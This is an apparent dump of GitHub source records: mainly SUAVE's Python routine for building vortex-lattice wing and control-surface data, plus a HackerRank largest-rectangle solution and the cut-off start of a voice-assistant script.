column=col).value\nprint(Dict)\n\n","repo_name":"Lokeshkoli/Firstdemo","sub_path":"testdata/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38837029853","text":"## @ingroup Methods-Aerodynamics-Common-Fidelity_Zero-Lift\n# make_VLM_wings.py\n\n# Created: Jun 2021, A. Blaufox\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\n\n# package imports \nimport numpy as np\nfrom copy import deepcopy\n\nimport SUAVE\nfrom SUAVE.Core import Data\nfrom SUAVE.Components.Wings import All_Moving_Surface \nfrom SUAVE.Components.Wings.Control_Surfaces import Aileron , Elevator , Slat , Flap , Rudder \nfrom SUAVE.Methods.Geometry.Two_Dimensional.Planform import populate_control_sections\nfrom SUAVE.Methods.Flight_Dynamics.Static_Stability.Approximations.Supporting_Functions import convert_sweep_segments\n\n# ------------------------------------------------------------------\n# make_VLM_wings()\n# ------------------------------------------------------------------ \n## @ingroup Methods-Aerodynamics-Common-Fidelity_Zero-Lift\ndef make_VLM_wings(geometry, settings):\n \"\"\" This parses through geometry.wings to create a Container of Data objects.\n Relevant VLM attributes are copied from geometry.wings to the Container.\n After, the wing data objects are reformatted. All control surfaces are \n also added to the Container as Data objects representing full wings. \n Helper variables are then computed (most notably span_breaks) for later. 
\n \n see make_span_break() for further details\n\n Assumptions: \n All control surfaces are appended directly to the wing, not wing segments.\n If a given wing has no segments, it must have either .taper or .chords.root \n and .chords.tip defined\n\n Source: \n None\n \n Inputs:\n geometry.\n wings.wing.\n twists.root\n twists.tip\n dihedral\n sweeps.quarter_chord OR sweeps.leading_edge\n thickness_to_chord\n taper\n chord.root\n chords.tip\n \n control_surface.\n tag\n span_fraction_start\n span_fraction_end\n deflection\n chord_fraction\n \n settings.discretize_control_surfaces --> set to True to generate control surface panels\n \n Properties Used:\n N/A\n \"\"\" \n # unpack inputs\n discretize_cs = settings.discretize_control_surfaces\n wings = copy_wings(geometry.wings)\n \n # ------------------------------------------------------------------\n # Reformat original wings to have at least 2 segments and additional values for processing later\n # ------------------------------------------------------------------ \n for wing in wings:\n wing.is_a_control_surface = False\n n_segments = len(wing.Segments.keys())\n if n_segments==0:\n # convert to preferred format for the panelization loop\n wing = convert_to_segmented_wing(wing)\n n_segments = 2\n else:\n # check for invalid/unsupported/conflicting geometry input \n if issubclass(wing.wing_type, All_Moving_Surface): # these cases unsupported due to the way the panelization loop is structured at the moment\n if not (wing.hinge_vector == np.array([0.,0.,0.])).all() and wing.use_constant_hinge_fraction:\n raise ValueError(\"A hinge_vector is specified, but the surface is set to use a constant hinge fraction\")\n if len(wing.control_surfaces) > 0:\n raise ValueError('Input: control surfaces are not supported on all-moving surfaces at this time')\n for segment in wing.Segments: #unsupported by convention\n if 'control_surfaces' in segment.keys() and len(segment.control_surfaces) > 0:\n raise ValueError('Input: control surfaces should be appended to the wing, not its segments. ' + \n 'This function will move the control surfaces to wing segments itself.') \n \n #move wing control surfaces to from wing to its segments\n wing = populate_control_sections(wing) if discretize_cs else wing\n \n #ensure wing has attributes that will be needed later\n wing_halfspan = wing.spans.projected * 0.5 if wing.symmetric else wing.spans.projected\n for i in range(n_segments): \n (ia, ib) = (0, 0) if i==0 else (i-1, i)\n seg_a = wing.Segments[ia]\n seg_b = wing.Segments[ib] \n seg_b.chord = seg_b.root_chord_percent *wing.chords.root ##may be worth implementing a self-calculating .chord attribute \n \n #guarantee that all segments have leading edge sweep\n if (i != 0) and (seg_a.sweeps.leading_edge is None):\n old_sweep = seg_a.sweeps.quarter_chord\n new_sweep = convert_sweep_segments(old_sweep, seg_a, seg_b, wing, old_ref_chord_fraction=0.25, new_ref_chord_fraction=0.0)\n seg_a.sweeps.leading_edge = new_sweep \n \n #give segments offsets for giving cs_wings an origin later\n section_span = (seg_b.percent_span_location - seg_a.percent_span_location) * wing_halfspan\n seg_b.x_offset = 0. if i==0 else seg_a.x_offset + section_span*np.tan(seg_a.sweeps.leading_edge)\n seg_b.dih_offset = 0. 
if i==0 else seg_a.dih_offset + section_span*np.tan(seg_a.dihedral_outboard)\n wing.Segments[-1].sweeps.leading_edge = 1e-8\n \n # each control_surface-turned-wing will have its own unique ID number\n cs_ID = 0\n \n # ------------------------------------------------------------------\n # Build wing Data() objects and wing.span_breaks from control surfaces on segments\n # ------------------------------------------------------------------ \n for wing in wings:\n if wing.is_a_control_surface == True: #skip if this wing is actually a control surface\n continue\n \n #prepare to iterate across all segments and control surfaces\n seg_breaks = SUAVE.Core.ContainerOrdered()\n LE_breaks = SUAVE.Core.ContainerOrdered()\n TE_breaks = SUAVE.Core.ContainerOrdered()\n n_segments = len(wing.Segments.keys())\n\n #process all control surfaces in each segment-------------------------------------\n for i in range(n_segments): \n (ia, ib) = (0, 0) if i==0 else (i-1, i)\n seg_a = wing.Segments[ia]\n seg_b = wing.Segments[ib] \n \n control_surfaces = seg_b.control_surfaces if 'control_surfaces' in seg_b.keys() else Data()\n for cs in control_surfaces: #should be no control surfaces on root segment\n # create and append a wing object from the control_surface object and relevant segments\n cs_wing = make_cs_wing_from_cs(cs, seg_a, seg_b, wing, cs_ID)\n wings.append(cs_wing)\n \n # register cs start and end span breaks\n cs_span_breaks = make_span_breaks_from_cs(cs, seg_a, seg_b, cs_wing, cs_ID)\n if cs.cs_type==Slat:\n LE_breaks.append(cs_span_breaks[0])\n LE_breaks.append(cs_span_breaks[1])\n else:\n TE_breaks.append(cs_span_breaks[0])\n TE_breaks.append(cs_span_breaks[1]) \n cs_ID += 1\n \n # register segment span break\n span_break = make_span_break_from_segment(seg_b)\n seg_breaks.append(span_break)\n\n #merge _breaks arrays into one span_breaks array----------------------------------\n # 1. sort all span_breaks by their span_fraction\n # 2. combine LE and TE breaks with the same span_fraction values (LE cuts from slats and TE cuts from others)\n # 3. 
scan LE and TE to pick up cs cuts that cross over one or more span breaks\n \n # 1: \n LE_breaks = sorted(LE_breaks, key=lambda span_break: span_break.span_fraction)\n TE_breaks = sorted(TE_breaks, key=lambda span_break: span_break.span_fraction)\n seg_breaks = sorted(seg_breaks, key=lambda span_break: span_break.span_fraction)\n \n # 2: similar to a 3-way merge sort\n span_breaks = SUAVE.Core.ContainerOrdered() \n n_LE = len(LE_breaks)\n n_TE = len(TE_breaks)\n n_seg = len(seg_breaks)\n i, j, k = 0,0,0\n big_num = float('inf')\n while True:\n LE_span = LE_breaks[i].span_fraction if (i < n_LE) else big_num\n TE_span = TE_breaks[j].span_fraction if (j < n_TE) else big_num\n seg_span = seg_breaks[k].span_fraction if (k < n_seg) else big_num\n \n if (LE_span==big_num) and (TE_span==big_num) and (seg_span==big_num):\n break\n \n if (LE_span <= TE_span) and (LE_span <= seg_span):\n add_span_break(LE_breaks[i], span_breaks)\n i += 1\n elif (TE_span <= LE_span) and (TE_span <= seg_span):\n add_span_break(TE_breaks[j], span_breaks)\n j += 1 \n elif (seg_span <= LE_span) and (seg_span <= TE_span):\n add_span_break(seg_breaks[k], span_breaks)\n k += 1 \n else:\n raise ValueError(\"No suitable span break\") #should never occur\n \n # 3:\n ib, ob = 0, 1 #inboard, outboard indices\n for edge, edge_str in enumerate(['LE','TE']):\n for i in range(len(span_breaks)-1):\n ID_i = span_breaks[i].cs_IDs[edge,ob]\n cut = span_breaks[i].cuts[edge,ob]\n if ID_i == -1:\n continue\n #copy the cs ID and its cut until the end of the control surface is found\n for j in range(i+1,len(span_breaks)):\n i += 1\n ID_j = span_breaks[j].cs_IDs[edge,ib] \n if ID_j == ID_i: #found control surface end\n break\n elif ID_j == -1: #found a span_break within control surface. copy values\n span_breaks[j].cs_IDs[edge,:] = [ID_i, ID_i]\n span_breaks[j].cuts[edge,:] = [cut, cut]\n else:\n raise ValueError('VLM does not support multiple control surfaces on the same edge at this time')\n \n # pack span_breaks\n wing.span_breaks = reprocess_span_breaks(span_breaks)\n \n # ------------------------------------------------------------------\n # Give cs_wings span_breaks arrays\n # ------------------------------------------------------------------ \n for cs_wing in wings:\n if cs_wing.is_a_control_surface == False: #skip if this wing isn't actually a control surface\n continue \n span_breaks = SUAVE.Core.ContainerOrdered()\n span_break = make_span_break_from_segment(cs_wing.Segments[0])\n span_breaks.append(span_break)\n span_break = make_span_break_from_segment(cs_wing.Segments[1])\n span_breaks.append(span_break) \n cs_wing.span_breaks = span_breaks\n \n return wings\n \n\n# ------------------------------------------------------------------\n# custom deepcopy(wings)\n# --TO DO-- This is a stand-in for a more fleshed-out VLM_surface class\n# ------------------------------------------------------------------ \ndef copy_wings(original_wings):\n \"\"\" This copies VLM attributes for every wing object in original_wings into \n a new wings container with new Data objects\n \n Inputs: \n original_wings - the original wings container\n \"\"\" \n return copy_large_container(original_wings, \"wings\")\n\ndef copy_large_container(large_container, type_str):\n \"\"\" This function helps avoid copying a container of large objects directly,\n especially if those objects are Physical_Components\n \n Inputs:\n objects - a Container of large objects\n \"\"\" \n container = SUAVE.Core.Container() if type_str != \"Segments\" else 
SUAVE.Core.ContainerOrdered()\n paths = get_paths(type_str)\n \n for obj in large_container: \n #copy from paths\n data = copy_data_from_paths(obj, paths) \n \n #special case new attributes\n if type_str == 'control_surfaces':\n data.cs_type = type(obj) # needed to identify the class of a control surface\n elif type_str == 'wings':\n data.wing_type = type(obj)\n if issubclass(data.wing_type, All_Moving_Surface):\n data.sign_duplicate = obj.sign_duplicate\n data.hinge_fraction = obj.hinge_fraction \n data.deflection = obj.deflection \n data.is_slat = False\n data.use_constant_hinge_fraction = obj.use_constant_hinge_fraction\n data.hinge_vector = obj.hinge_vector\n data.deflection_last = 0.\n container.append(data)\n \n return container\n\ndef copy_data_from_paths(old_object, paths):\n \"\"\" This copies the attributes specified by 'paths' from old_object \n into a new Data() object\n\n Inputs: \n old_object - an object to copy\n \"\"\" \n new_object = Data() \n for path in paths:\n val = old_object.deep_get(path)\n recursive_set(new_object, path, val)\n return new_object\n\ndef recursive_set(data_obj, path, val):\n \"\"\" This is similar to the deep_set function, but also creates\n intermediate Data() objects for keys that do not yet exist. Special\n copy cases are made for paths that lead to large class objects\n \"\"\"\n special_case_keys = ['control_surfaces', 'Segments']\n keys = path.split('.')\n key = keys[0]\n if len(keys) == 1:\n if key in special_case_keys:\n data_obj[key] = copy_large_container(val, key) # will eventually recurse back to this function\n else:\n data_obj[key] = deepcopy(val) # at this point, should only be copying primitive types or very small Data objects\n return\n \n has_key = key in data_obj.keys()\n if not has_key:\n data_obj[key] = Data()\n \n new_path = '.'.join(keys[1:])\n recursive_set(data_obj[key], new_path, val)\n\ndef get_paths(type_str):\n \"\"\" This returns a list of the paths to the attributes needed in VLM\n for a given type of object.\n \n Note that if any element in the paths array is the same as the array's correponding type_str, \n this will cause copy_large_container() to recurse infinitely. It will also recurse infinitely \n if any element in the current array is the same as a type_str that corresponds to a different array\n which itself has an element that is the same as the current type_str. 
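\n\n    For example (illustrative), get_paths(\"Segments\") returns dotted attribute paths\n    such as 'percent_span_location' and 'sweeps.quarter_chord'; copy_data_from_paths()\n    reads each path with deep_get() and writes it back with recursive_set().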
\n \n Inputs:\n type_str - \"wings\", \"control_surfaces\" or \"Segments\"\n \"\"\" \n if type_str == 'wings':\n paths = ['tag',\n 'origin',\n 'symmetric',\n 'vertical',\n 'taper',\n 'dihedral',\n 'thickness_to_chord',\n 'spans.projected',\n 'chords.root',\n 'chords.tip',\n 'sweeps.quarter_chord',\n 'sweeps.leading_edge',\n 'twists.root',\n 'twists.tip',\n 'vortex_lift',\n 'Airfoil',\n 'Segments',\n 'control_surfaces',\n ]\n elif type_str == 'control_surfaces':\n paths = ['tag', \n 'span', \n 'span_fraction_start',\n 'span_fraction_end', \n 'hinge_fraction', \n 'chord_fraction', \n 'sign_duplicate',\n 'deflection', \n 'configuration_type', \n 'gain', \n ]\n elif type_str == 'Segments':\n paths = ['tag', \n 'percent_span_location', \n 'twist',\n 'root_chord_percent', \n 'dihedral_outboard', \n 'thickness_to_chord', \n 'sweeps.quarter_chord', \n 'sweeps.leading_edge', \n 'Airfoil', \n ] \n \n return paths\n\n# ------------------------------------------------------------------\n# wing helper functions\n# ------------------------------------------------------------------ \ndef make_cs_wing_from_cs(cs, seg_a, seg_b, wing, cs_ID):\n \"\"\" This uses a control surface and the segment it lies between to create\n an equilvalent wing object. The wing has a couple of non-standard attributes\n that contain information about the control surface it came from\n\n Assumptions: \n None\n\n Source: \n None\n \n Inputs: \n cs - a control surface object\n seg_a - the segment object inboard of the cs\n seg_b - the segment object outboard of the cs. The cs is also attached to this\n wing - the wing object which owns seg_a and seg_b\n cs_ID - a unique identifier for the cs_wing\n \n Outputs:\n cs_wing - a Data object with relevant Wing and Control_Surface attributes\n \n Properties Used:\n N/A\n \"\"\" \n hspan = wing.spans.projected*0.5 if wing.symmetric else wing.spans.projected\n \n cs_wing = copy_data_from_paths(SUAVE.Components.Wings.Wing(), get_paths(\"wings\"))\n \n #standard wing attributes--------------------------------------------------------------------------------------\n cs_wing.tag = wing.tag + '__cs_id_{}'.format(cs_ID)\n span_a = seg_a.percent_span_location\n span_b = seg_b.percent_span_location\n twist_a = seg_a.twist\n twist_b = seg_b.twist\n cs_wing.twists.root = np.interp(cs.span_fraction_start, [span_a, span_b], [twist_a, twist_b])\n cs_wing.twists.tip = np.interp(cs.span_fraction_end, [span_a, span_b], [twist_a, twist_b])\n cs_wing.dihedral = seg_a.dihedral_outboard\n cs_wing.thickness_to_chord = (seg_a.thickness_to_chord + seg_b.thickness_to_chord)/2\n cs_wing.origin = np.array(wing.origin) *1.\n \n span_fraction_tot = cs.span_fraction_end - cs.span_fraction_start\n cs_wing.spans.projected = wing.spans.projected * span_fraction_tot #includes 2x length if cs is on a symmetric wing \n \n wing_chord_local_at_cs_root = np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.chord, seg_b.chord])\n wing_chord_local_at_cs_tip = np.interp(cs.span_fraction_end, [span_a, span_b], [seg_a.chord, seg_b.chord])\n cs_wing.chords.root = wing_chord_local_at_cs_root * cs.chord_fraction \n cs_wing.chords.tip = wing_chord_local_at_cs_tip * cs.chord_fraction \n cs_wing.taper = cs_wing.chords.tip / cs_wing.chords.root\n cs_wing.sweeps.quarter_chord = 0. # leave at 0. 
VLM will use leading edge\n\n cs_wing.symmetric = wing.symmetric\n cs_wing.vertical = wing.vertical\n cs_wing.vortex_lift = wing.vortex_lift\n\n #non-standard wing attributes, mostly to do with cs_wing's identity as a control surface-----------------------\n #metadata\n cs_wing.is_a_control_surface = True\n cs_wing.cs_ID = cs_ID\n cs_wing.name = wing.tag + '__' + seg_b.tag + '__' + cs.tag + '__cs_ID_{}'.format(cs_ID)\n cs_wing.is_slat = (cs.cs_type==Slat)\n cs_wing.is_aileron = (cs.cs_type==Aileron)\n cs_wing.pivot_edge = 'TE' if cs_wing.is_slat else 'LE'\n \n #control surface attributes\n cs_wing.chord_fraction = cs.chord_fraction\n cs_wing.hinge_fraction = cs.hinge_fraction\n cs_wing.sign_duplicate = cs.sign_duplicate\n cs_wing.deflection = cs.deflection\n cs_wing.deflection_last = 0.\n \n #adjustments---------------------------------------------------------------------------------------------------\n #adjust origin - may need to be adjusted later\n wing_halfspan = wing.spans.projected * 0.5 if wing.symmetric else wing.spans.projected\n LE_TE_cs_offset = 0. if cs_wing.is_slat else (1 - cs.chord_fraction)*wing_chord_local_at_cs_root\n cs_wing.origin[0,0] += np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.x_offset, seg_b.x_offset]) + LE_TE_cs_offset\n cs_wing.origin[0,1] += cs.span_fraction_start * wing_halfspan if not wing.vertical else np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.dih_offset, seg_b.dih_offset])\n cs_wing.origin[0,2] += np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.dih_offset, seg_b.dih_offset]) if not wing.vertical else cs.span_fraction_start * wing_halfspan\n \n # holds all required y-coords. Will be added to during discretization to ensure y-coords match up between wing and control surface.\n rel_offset = cs_wing.origin[0,1] - wing.origin[0][1] if not cs_wing.vertical else cs_wing.origin[0,2] - wing.origin[0][2]\n cs_wing.y_coords_required = [cs.span_fraction_end*hspan - rel_offset] #initialize with the tip y-coord. Other coords to be added in VLM\n\n #find sweep of the 'outside' edge (LE for slats, TE for everything else)\n use_le_sweep = not (seg_a.sweeps.leading_edge is None)\n new_cf = 0. if cs_wing.is_slat else 1\n old_cf = 0. if use_le_sweep else 0.25\n old_sweep = seg_a.sweeps.leading_edge if use_le_sweep else seg_a.sweeps.quarter_chord\n new_sweep = convert_sweep_segments(old_sweep, seg_a, seg_b, wing, old_ref_chord_fraction=old_cf, new_ref_chord_fraction=new_cf)\n cs_wing.outside_sweep = new_sweep\n \n #find leading edge sweep\n if cs_wing.is_slat:\n cs_wing.sweeps.leading_edge = new_sweep\n else:\n new_cf = 1 - cs_wing.chord_fraction\n new_sweep = convert_sweep_segments(old_sweep, seg_a, seg_b, wing, old_ref_chord_fraction=old_cf, new_ref_chord_fraction=new_cf)\n cs_wing.sweeps.leading_edge = new_sweep\n \n #convert to segmented wing-------------------------------------------------------------------------------------\n cs_wing = convert_to_segmented_wing(cs_wing)\n \n # give segments offsets (in coordinates relative to the cs_wing)\n cs_wing.Segments[0].x_offset = 0.\n cs_wing.Segments[0].dih_offset = 0. 
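\n    # (editor note) the tip offsets below mirror the per-segment offsets computed for\n    # full wings above: span * tan(leading-edge sweep) in x, span * tan(dihedral) for\n    # the dihedral direction, taken over the control surface's own span.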
\n cs_wing.Segments[1].x_offset = wing_halfspan * span_fraction_tot *np.tan(cs_wing.Segments[0].sweeps.leading_edge)\n cs_wing.Segments[1].dih_offset = wing_halfspan * span_fraction_tot *np.tan(cs_wing.Segments[0].dihedral_outboard) \n \n #add airfoil\n cs_wing.Segments[0].Airfoil = seg_a.Airfoil\n cs_wing.Segments[1].Airfoil = seg_b.Airfoil if cs.span_fraction_end==span_b else seg_a.Airfoil\n \n return cs_wing\n\ndef convert_to_segmented_wing(wing):\n \"\"\" This turns a non-segmented wing into a segmented wing\n\n Assumptions: \n If a given wing has no segments, it must have either .taper or .chords.tip defined\n\n Source: \n None\n \n Inputs: \n VD - vortex distribution \n geometry.\n wings.wing.\n twists.root\n twists.tip\n dihedral\n sweeps.quarter_chord\n thickness_to_chord\n taper\n chord.root\n chords.tip\n \n Properties Used:\n N/A\n \"\"\" \n if len(wing.Segments.keys()) > 0:\n return wing \n # root segment \n segment = SUAVE.Components.Wings.Segment()\n segment.tag = 'root_segment'\n segment.percent_span_location = 0.0\n segment.twist = wing.twists.root\n segment.root_chord_percent = 1.\n segment.chord = wing.chords.root #non-standard attribute, needed for VLM\n segment.dihedral_outboard = wing.dihedral\n segment.sweeps.quarter_chord = wing.sweeps.quarter_chord\n segment.sweeps.leading_edge = wing.sweeps.leading_edge\n segment.thickness_to_chord = wing.thickness_to_chord\n if wing.Airfoil: \n segment.append_airfoil(wing.Airfoil.airfoil) \n wing.Segments.append(segment) \n \n # tip segment \n if wing.taper==0:\n wing.taper = wing.chords.tip / wing.chords.root\n elif wing.chords.tip==0:\n wing.chords.tip = wing.chords.root * wing.taper\n \n segment = SUAVE.Components.Wings.Segment()\n segment.tag = 'tip_segment'\n segment.percent_span_location = 1.\n segment.twist = wing.twists.tip\n segment.root_chord_percent = wing.taper\n segment.chord = wing.chords.tip #non-standard attribute, needed for VLM\n segment.dihedral_outboard = 0.\n segment.sweeps.quarter_chord = 0.\n segment.sweeps.leading_edge = 1e-8\n segment.thickness_to_chord = wing.thickness_to_chord\n if wing.Airfoil: \n segment.append_airfoil(wing.Airfoil.airfoil) \n wing.Segments.append(segment) \n \n return wing\n\n# ------------------------------------------------------------------\n# span_break processing helper functions\n# ------------------------------------------------------------------ \ndef add_span_break(span_break, span_breaks):\n \"\"\" This is a helper function that appends or superimposes a span_break \n into span_breaks\n\n Assumptions: \n None\n\n Source: \n None\n \n Inputs: \n span_break\n span_breaks\n \n Properties Used:\n N/A\n \"\"\" \n if len(span_breaks) == 0:\n span_breaks.append(span_break)\n else:\n # if non-coincident, the space between the breaks is nominal wing: append the new span_break\n if span_breaks[-1].span_fraction < span_break.span_fraction: \n span_breaks.append(span_break)\n \n # else coincident: need to superimpose cs_IDs and cuts, not append\n else:\n boolean = span_breaks[-1].cs_IDs==-1\n span_breaks[-1].cs_IDs[boolean] = span_break.cs_IDs[boolean]\n span_breaks[-1].cuts[boolean] = span_break.cuts[boolean]\n \n return\n\n\ndef reprocess_span_breaks(span_breaks):\n \"\"\" This reprocesses the tags in a newly superimposed set of\n span_breaks and creates a new object so that the new keys match \n the new tags\n \n Inputs:\n span_breaks\n \"\"\" \n sbs = SUAVE.Core.ContainerOrdered()\n for i,span_break in enumerate(span_breaks):\n span_break.tag = make_span_break_tag(span_break)\n 
sbs.append(span_break)\n return sbs\n\n# ------------------------------------------------------------------\n# span_break creation helper functions\n# ------------------------------------------------------------------ \ndef make_span_break_from_segment(seg):\n \"\"\" This creates a span_break Data() object from a segment\n\n Assumptions: \n None\n\n Source: \n None\n \n Inputs: \n seg - a segment object with standard attributes except for:\n .chord\n \n Properties Used:\n N/A\n \"\"\" \n span_frac = seg.percent_span_location\n Airfoil = seg.Airfoil\n dihedral_ob = seg.dihedral_outboard\n sweep_ob_QC = seg.sweeps.quarter_chord\n sweep_ob_LE = seg.sweeps.leading_edge\n twist = seg.twist \n local_chord = seg.chord #non-standard attribute\n x_offset = seg.x_offset\n dih_offset = seg.dih_offset \n span_break = make_span_break(-1, 0, 0, span_frac, 0., Airfoil,\n dihedral_ob, sweep_ob_QC, sweep_ob_LE, twist, local_chord,\n x_offset, dih_offset) \n span_break.cuts = np.array([[0.,0.], \n [1.,1.]])\n return span_break\n\ndef make_span_breaks_from_cs(cs, seg_a, seg_b, cs_wing, cs_ID):\n \"\"\" This creates span_break Data() objects from a control surface, its\n owning segments, and their owning cs_wing\n\n Assumptions: \n None\n\n Source: \n None\n \n Inputs: \n cs - a control surface object\n seg_a - the segment object inboard of the cs\n seg_b - the segment object outboard of the cs. The cs is also attached to this\n cs_wing - the wing object which owns seg_a and seg_b\n cs_ID - a unique identifier for the cs_wing\n \n Properties Used:\n N/A\n \"\"\" \n is_slat = (cs.cs_type==Slat)\n LE_TE = 0 if is_slat else 1\n span_a = seg_a.percent_span_location\n span_b = seg_b.percent_span_location \n \n #inboard span break\n ib_ob = 1 #the inboard break of the cs is the outboard part of the span_break\n span_frac = cs.span_fraction_start \n ob_cut = cs.chord_fraction if is_slat else 1 - cs.chord_fraction\n Airfoil = seg_a.Airfoil\n dihedral_ob = seg_a.dihedral_outboard\n sweep_ob_QC = seg_a.sweeps.quarter_chord\n sweep_ob_LE = seg_a.sweeps.leading_edge\n twist = cs_wing.twists.root \n local_chord = cs_wing.chords.root / cs.chord_fraction\n x_offset = np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.x_offset, seg_b.x_offset])\n dih_offset = np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.dih_offset, seg_b.dih_offset])\n inboard_span_break = make_span_break(cs_ID, LE_TE, ib_ob, span_frac, ob_cut, Airfoil,\n dihedral_ob, sweep_ob_QC, sweep_ob_LE, twist, local_chord,\n x_offset, dih_offset)\n \n #outboard span break\n is_coincident = (cs.span_fraction_end==seg_b.percent_span_location)\n ib_ob = 0 #the outboard break of the cs is the inboard part of the span_break\n span_frac = cs.span_fraction_end\n ib_cut = cs.chord_fraction if is_slat else 1 - cs.chord_fraction\n Airfoil = seg_b.Airfoil if is_coincident else seg_a.Airfoil #take seg_b value if this outboard break is conicident with seg_b \n dihedral_ob = seg_b.dihedral_outboard if is_coincident else seg_a.dihedral_outboard\n sweep_ob_QC = seg_b.sweeps.quarter_chord if is_coincident else seg_a.sweeps.quarter_chord\n sweep_ob_LE = seg_b.sweeps.leading_edge if is_coincident else seg_a.sweeps.leading_edge\n twist = cs_wing.twists.tip \n local_chord = cs_wing.chords.tip / cs.chord_fraction\n x_offset = np.interp(cs.span_fraction_end, [span_a, span_b], [seg_a.x_offset, seg_b.x_offset])\n dih_offset = np.interp(cs.span_fraction_end, [span_a, span_b], [seg_a.dih_offset, seg_b.dih_offset]) \n outboard_span_break = make_span_break(cs_ID, LE_TE, 
ib_ob, span_frac, ib_cut, Airfoil,\n dihedral_ob, sweep_ob_QC, sweep_ob_LE, twist, local_chord,\n x_offset, dih_offset) \n return inboard_span_break, outboard_span_break\n\ndef make_span_break(cs_ID, LE_TE, ib_ob, span_frac, chord_cut, Airfoil,\n dihedral_ob, sweep_ob_QC, sweep_ob_LE, twist, local_chord,\n x_offset, dih_offset):\n \"\"\" This gathers information related to a span break into one Data() object.\n A span break is the spanwise location of a discontinuity in the discretization\n of the panels. These can be caused by segments and by the inboard and outboard \n edges of a control surface. The inboard and outboard sides of a span break can\n have different chords due to cuts made by control surfaces. Ultimately, the\n attributes of the span_breaks of the wing will provide the discretization function \n generate_wing_vortex_distribution() with the necessary values to make VLM panels\n as well as reshape those panels to make the control surface cuts dipicted below.\n \n A diagram is given below:\n\n\n nominal local chord\n fuselage inboard LE | | . outboard LE\n <--- | | . \n | | .\n | | . <-- cut from a slat\n | | |\n | | |\n | | |\n | | |\n | | |\n | | |\n | | |\n | | . <-- cut from a non-slat control surface with a different chord \ncut from a non-slat control surface | | . fraction than the control surface on the inboard side\n --> . | .\n . | .\n inboard TE . | . outboard TE\n \n \n \n |_______________________|\n |\n there is 0 spanwise \n distance between inboard \n and outboard sides\n\n Outputs:\n span_break\n \n Properties Used:\n N/A\n \"\"\" \n span_break = Data()\n span_break.cs_IDs = np.array([[-1,-1], # [[inboard LE cs, outboard LE cs],\n [-1,-1]]) # [inboard TE cs, outboard TE cs]]\n span_break.cs_IDs[LE_TE,ib_ob] = cs_ID\n span_break.span_fraction = span_frac\n # The following 'cut' attributes are in terms of the local total chord and represent positions. 
\n # (an aileron with chord fraction 0.2 would have a cut value of 0.8)\n # For inboard_cut, -1 takes value of previous outboard cut value in a later function\n # For outboard_cut, -1 takes value of next inboard cut value.\n # If no break directly touching this one, cut becomes 0 (LE) or 1 (TE).\n span_break.cuts = np.array([[0.,0.], # [[inboard LE cut, outboard LE cut],\n [1.,1.]]) # [inboard TE cut, outboard TE cut]]\n span_break.cuts[LE_TE,ib_ob] = chord_cut\n span_break.Airfoil = Airfoil\n span_break.dihedral_outboard = dihedral_ob\n span_break.sweep_outboard_QC = sweep_ob_QC\n span_break.sweep_outboard_LE = sweep_ob_LE\n span_break.twist = twist\n span_break.local_chord = local_chord #this is the local chord BEFORE cuts are made\n span_break.x_offset = x_offset\n span_break.dih_offset = dih_offset #dih_offset is the y or z accumulated offset from dihedral\n span_break.tag = make_span_break_tag(span_break)\n return span_break\n\ndef make_span_break_tag(span_break):\n location = round(span_break.span_fraction, 3)\n cs_IDs_arr = span_break.cs_IDs.flatten()\n cs_IDs_str = '{}'.format(cs_IDs_arr).replace('[','').replace(']','').replace('-1', 'na').replace(' ', '_')\n \n return \"{}___{}\".format(location, cs_IDs_str)\n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Methods/Aerodynamics/Common/Fidelity_Zero/Lift/make_VLM_wings.py","file_name":"make_VLM_wings.py","file_ext":"py","file_size_in_byte":36358,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"18554728575","text":"def getSize(height, start, end):\n return height*(end-start)\n\nn = int(input())\nhist = list(map(int,input().split()))\n\npositions = []\nheights = []\n# stack[-1] is always the top of the stack, like stack.peek()\n# https://www.youtube.com/watch?v=VNbkzsnllsU\n# https://www.youtube.com/watch?v=ZmnqCZp9bBs\n# https://www.hackerrank.com/challenges/largest-rectangle/editorial\nmaxArea = 0\n#for position, height in enumerate(hist):\nfor position in range(0,len(hist)):\n height = hist[position]\n if (len(heights)==0):\n positions.append(position)\n heights.append(height)\n elif (height > heights[-1]): # hacky way to avoid using extra variable\n positions.append(position)\n heights.append(height)\n elif height < heights[-1]:\n # Pop as long as the stack is not empty and the examined value is less than the current stack top\n while (len(heights) and height < heights[-1]):\n start = positions.pop()\n currHeight = heights.pop()\n size = getSize(currHeight, start, position)\n # print(size)\n if size > maxArea:\n maxArea = size\n if (not len(heights) or height > heights[-1]):\n heights.append(height)\n positions.append(start)\n# Used to clean up the stack\nwhile (len(heights)):\n start = positions.pop()\n currHeight = heights.pop()\n size = getSize(currHeight, start, n) # size from stack end compared to the value popped\n if size > maxArea:\n maxArea = size\n\nprint(maxArea)\n","repo_name":"gakonst/Challenges","sub_path":"Hackerrank/DataStructures/Stacks/largestRectangle.py","file_name":"largestRectangle.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"4986720840","text":"import os\nimport re\nimport requests\nimport speech_recognition as sr\nfrom datetime import datetime\nfrom googlesearch import search\nfrom TTS import speak\nfrom _approve import _approve\n\n\ndef sanitize_and_get_user_query():\n r = sr.Recognizer()\n query = \"\"\n try:\n with 
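# --- Editor's sketch (hedged, hypothetical chord fractions): the cuts convention
# documented in the comment above. A slat cuts in from the leading edge, so its cut
# sits at chord_fraction; any other control surface cuts in from the trailing edge,
# so its cut sits at 1 - chord_fraction (mirroring ob_cut/ib_cut in
# make_span_breaks_from_cs above).
def cut_position(chord_fraction, is_slat):
    return chord_fraction if is_slat else 1.0 - chord_fraction

print(cut_position(0.15, True))    # slat         -> 0.15 (LE row of span_break.cuts)
print(cut_position(0.20, False))   # aileron/flap -> 0.8  (TE row of span_break.cuts)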
